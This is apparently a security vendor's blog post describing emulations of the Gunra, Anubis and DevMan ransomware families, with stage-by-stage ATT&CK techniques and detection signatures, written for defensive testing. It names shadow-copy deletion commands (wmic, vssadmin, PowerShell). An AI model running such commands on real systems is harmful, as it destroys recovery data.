On July 22, 2025, AttackIQ introduced Ransom Tales, an initiative focused on routinely emulating the Tactics, Techniques, and Procedures (TTPs) associated with the prolific ransomware families currently dominating the threat landscape. Each volume in this series is designed to dissect the operational behaviors of multiple ransomware families and translate them into realistic emulations that defenders can employ to rigorously challenge their security controls and enhance resilience against disruptive and extortive threats.
In this second volume, AttackIQ presents three new attack graphs that emulate the Tactics, Techniques and Procedures (TTPs) associated with the Gunra, Anubis and DevMan ransomware families with the objective of assisting customers in validating their security controls and their ability to defend against these disruptive and extortive threats.
Validating your security program performance against these behaviors is vital in reducing risk. By employing these assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against baseline behaviors associated with prolific and sophisticated ransomware strains.
- Assess their security posture against opportunistic and financially motivated adversaries that do not discriminate when selecting their targets.
- Continuously validate detection and prevention pipelines against a playbook similar to those of many of the adversaries currently focused on ransomware activities.
[Malware Emulation] Gunra Ransomware – 2025-05 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation replicates the sequence of behaviors associated with the deployment of Gunra ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
Gunra is a ransomware strain that emerged in April 2025. Developed in C/C++ and derived from the leaked Conti ransomware source code, it has since compromised numerous high-profile organizations worldwide. Its operators target a diverse range of industries, including real estate, pharmaceuticals, and manufacturing, with confirmed victims in Japan, Egypt, Panama, Italy, and Argentina.
Designed to infect Windows environments, Gunra exhibits a comprehensive set of capabilities designed to maximize impact and minimize detection. It is capable of retrieving system information, traversing the file system, enumerating running processes, and deleting shadow copies using Windows Management Instrumentation (WMI). Its evasion techniques include debugger detection, obfuscation to conceal malicious behavior, and avoidance of rule-based detection systems.
Gunra is also known for its aggressive double-extortion strategy. After exfiltrating and encrypting sensitive information, the group threatens to publish the stolen information on a Tor-hosted Dedicated Leak Site (DLS), applying further pressure on victims to meet ransom demands.
Initial Access & Discovery – Gunra Ransomware Deployment and Environment Reconnaissance
This stage begins with the deployment of the Gunra ransomware, which, once operational, checks for the presence of a debugger, retrieves general system information, and enumerates running processes via Windows API. It also retrieves the MachineGUID by querying the Windows Registry.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.
Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.
Process Discovery (T1057): This scenario uses Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
Impact – Gunra Ransomware Encryption
This stage begins with the enumeration of available drives via the GetLogicalDrives API, followed by systematic traversal using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Once completed, Volume Shadow Copies are deleted using a Windows Management Instrumentation (WMI) command or alternatively through a WMI Object. Finally, it encrypts the identified files using a combination of ChaCha20 for file encryption with RSA-4096 for key encryption.
System Information Discovery (T1082): This scenario executes the GetLogicalDriveStringsW Windows API call to retrieve information regarding the system’s physical drives.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a Volume Shadow Copy created by the assessment template.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by Gunra ransomware.
[Malware Emulation] Anubis Ransomware – 2025-06 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation replicates the sequence of behaviors associated with the deployment of Anubis ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
Anubis is a ransomware strain operated under a Ransomware-as-a-Service (RaaS) model that emerged in early 2025. What distinguishes Anubis from other RaaS operations is its combination of file encryption with destructive capabilities, specifically, the deliberate wiping of directories to sabotage recovery efforts. This additional layer of destruction significantly reduces the probability of successfully restoring files and intensifies the pressure on victims, increasing the consequences of an otherwise damaging breach.
In December 2024, researchers identified a ransomware sample named “Sphinx,” which appeared to be in development. Its ransom note lacked both a TOR site and a unique victim ID, suggesting it was not yet operational. A comparative analysis of the Sphinx and Anubis binaries revealed near-identical codebases, with the only notable difference being the function responsible for generating the ransom note. These findings suggest that while the codebase of the ransomware remained the same, the messaging and branding were finalized shortly before its eventual debut as Anubis.
Discovery & Impact – Anubis Ransomware Deployment and File Encryption
This stage begins with the deployment of Anubis ransomware, which, once operational, invokes the AdjustTokenPrivileges API to enable the SeDebugPrivilege, elevating its ability to interact and manipulate processes running under higher-privileged contexts, regardless of access control restrictions.
It then retrieves general system information via the GetSystemInfo and GetNativeSystemInfo APIs and enumerates running processes via the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs.
Next, it deletes Volume Shadow Copies through vssadmin.exe. Finally, it encrypts files using a combination of ChaCha20 for file encryption and Elliptic-Curve Cryptography (ECC) via Curve25519 for key encryption.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Access Token Manipulation (T1134): This scenario enables the SeDebugPrivilege privilege for the current process using the AdjustTokenPrivilege Windows API.
System Information Discovery (T1082): This scenario executes the GetSystemInfo Native API call to retrieve information associated to the system.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.
Process Discovery (T1057): This scenario uses Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by Anubis ransomware.
[Malware Emulation] DevMan Ransomware – 2025-07 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation replicates the sequence of behaviors associated with the deployment of DevMan ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
DevMan is a ransomware strain that has been active since at least 2025. It operates its own Dedicated Leak Site (DLS), Devman’s Place, and since its emergence has claimed responsibility for nearly 40 victims, primarily located in Asia and Africa, with sporadic targeting in Latin America and Europe.
DevMan is derived from DragonForce ransomware, a Ransomware-as-a-Service (RaaS) platform that enables affiliates to generate customized variants. This model likely facilitated the emergence of DevMan, which, although based on DragonForce, has been significantly customized and repackaged by its operators.
While multiple security controls flag DevMan samples as DragonForce or even Conti, behavioral analysis reveals unique characteristics that support its classification as a standalone strain. Notably, DevMan exhibits no Command and Control (C2) communication during execution, aside from limited Serer Message Block (SMB) probing activity, suggesting an offline-oriented operation model. It supports three encryption modes, full, header-only, and custom, granting its operators flexible control over execution speed during compromise.
DragonForce, a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that emerged in August 2023, has been previously emulated by AttackIQ on May 23, 2025. Originally identified as a pro-Palestine hacktivist operation, the group has since evolved into a hybrid adversary, blending political motives with a clear focus on financial extortion. Despite its ideological roots, the group increasingly prioritizes profit while continuing to target government organizations.
Initial Access & Discovery – DevMan Ransomware Deployment and Preliminary Environment Reconnaissance
This stage begins with the deployment of the DevMan ransomware, which, once operational, attempts to detect the presence of a debugger by invoking the IsDebuggerPresent Windows API. If no debugging environment is detected, it proceeds to determine the system location by invoking the EnumSystemLocalesW, GetLocaleInfoW, GetUserDefaultLCID, and GetACP APIs.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Virtualization/Sandbox Evasion (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Location Discovery (T1614): This scenario executes the EnumSystemLocalesW Windows API to enumerate the locales installed on or supported by the operating system.
System Location Discovery (T1614): This scenario executes the GetLocaleInfoW Windows API to retrieve the user’s default country locale code from the system.
System Location Discovery (T1614): This scenario executes the GetUserDefaultLCID Windows API to retrieve the user default locale ID from the system.
System Location Discovery (T1614): This scenario executes the GetACP Windows API to retrieve the current Windows ANSI code page identifier for the operating system.
Discovery – Local System Reconnaissance
This stage begins with the retrieval of general system information via the GetNativeSystemInfo API, followed by the inspection of the operating system’s access tokens through the GetTokenInformation API. It then retrieves the MachineGUID by querying the Windows Registry.
Subsequently, it enumerates running processes using a combination of the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs. To gather detailed process information, it invokes the NtQuerySystemInformation API.
System Information Discovery (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.
System Information Discovery (T1082): This scenario executes the GetTokenInformation Windows API call command to retrieve information regarding the access token of the current process.
Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.
Process Discovery (T1057): This scenario uses Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
System Information Discovery (T1082): This scenario executes NtQuerySystemInformation API with the SystemProcessInformation argument to enumerate system processes.
Impact – DevMan Ransomware Encryption
This stage begins with the enumeration of available drives by invoking the GetLogicalDriveStringsW API, followed by the retrieval of drive-specific information using DeviceIoControl with the IOCTL_STORAGE_QUERY_PROPERTY argument.
Subsequently, each identified drive is recursively traversed using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Once completed, Volume Shadow Copies are deleted via a Windows Management Instrumentation (WMI) command. Finally, it encrypts the identified files using a combination of ChaCha8 for file encryption and RSA-1024 for key encryption.
System Information Discovery (T1082): This scenario executes the GetLogicalDriveStringsW Windows API call to retrieve information regarding the system’s physical drives.
System Information Discovery (T1082): This scenario executes the DeviceIoControl API with the IOCTL_STORAGE_QUERY_PROPERTY argument to retrieve system drive information, such as the serial number, to profile the target’s system.
File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a Volume Shadow Copy created by the emulation.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by DevMan ransomware.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by these threats, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Ingress Tool Transfer (T1105):
Adversaries depend on the deployment of payloads, often across multiple stages, within targeted environments to achieve their objectives. Given this dependency, it is essential to employ both Endpoint and Network security controls to detect and block these throughout the multiple phases of delivery and execution.
1a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)
1b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
2. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
2a. Detection
Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity
Process Name == (cmd.exe OR powershell.exe)Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery:
Wrap-up
In summary, these emulations will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Gunra, Anubis and DevMan ransomware operators. With data generated from continuous testing and use of these assessment templates, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
